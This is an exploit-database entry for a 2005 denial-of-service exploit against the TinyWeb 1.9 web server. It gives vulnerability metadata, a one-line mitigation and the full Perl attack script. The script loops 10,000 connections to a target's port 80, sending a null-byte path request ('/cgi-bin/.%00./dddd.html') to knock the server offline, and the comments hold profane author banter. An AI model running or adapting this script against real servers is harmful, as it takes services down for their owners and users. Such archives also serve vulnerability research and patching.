TinyWeb version 1.9 DoS Exploit

vendor:

TinyWeb

by:

++Karak0rsan++

5.5

CVSS

MEDIUM

Denial of Service (DoS)

CWE

Product Name: TinyWeb

Affected Version From: 1.9

Affected Version To: 1.9

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2005

TinyWeb version 1.9 DoS Exploit

This exploit allows an attacker to perform a Denial of Service attack on a target running TinyWeb version 1.9. It sends multiple requests to the target's /cgi-bin/.%00./dddd.html URL, causing the server to become unresponsive.

Mitigation:

Upgrade to a patched version of TinyWeb or use a different web server software.

Source

Exploit-DB raw data:

#TinyWeb version 1.9 DoS Exploit
#Coded bY ++Karak0rsan++
#Usage:perl tiny.pl [target]
#Greetz:Phalaposher,r3d_b4r0n,Hurby,ZzagorR,L4M3R,zeronc,Atak,sloan,fox and
#all my friends
# w0rdz: cengiz g t ne sokam senin ehehheh bak exploit yay nlan rsa reziL #olacan :D ama #yay nlanmaz belki yay nlansada bo ver nickini s ylemiyom #anlamazlar :P okullar a l yo peder benim #bilg. kald r yo ne yapcam ben #bilmiyom a.k :) siktiri boktan bi dos exploiti yazd k yolluyoz g venlik
#sitesine :D neyse uzatmayal m "I AM 15 YEARS OLD" ya m z belirtelim :D

$target=$ARGV[0];

if(!$ARGV[0]){
        print "TinyWeb version 1.9 DoS Exploit\n";
        print "Coded by ++Karak0rsan++\n";
        print "Usage:perl tiny.pl [target]\n";
}


use IO::Socket;
$sock = new IO::Socket::INET( PeerAddr => $target,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($sock);
if($sock){
        print "[+]Attacking...\n";
}


$ish=1;

do {
$ish++;
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $target,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Didnt Connect,please check your target
address!\n";
print $socket "GET /cgi-bin/.%00./dddd.html HTTP/1.0\r\n";
close($socket);
} while ($ish < 10000);

print "OK ;)\n";
exit();

# milw0rm.com [2005-02-01]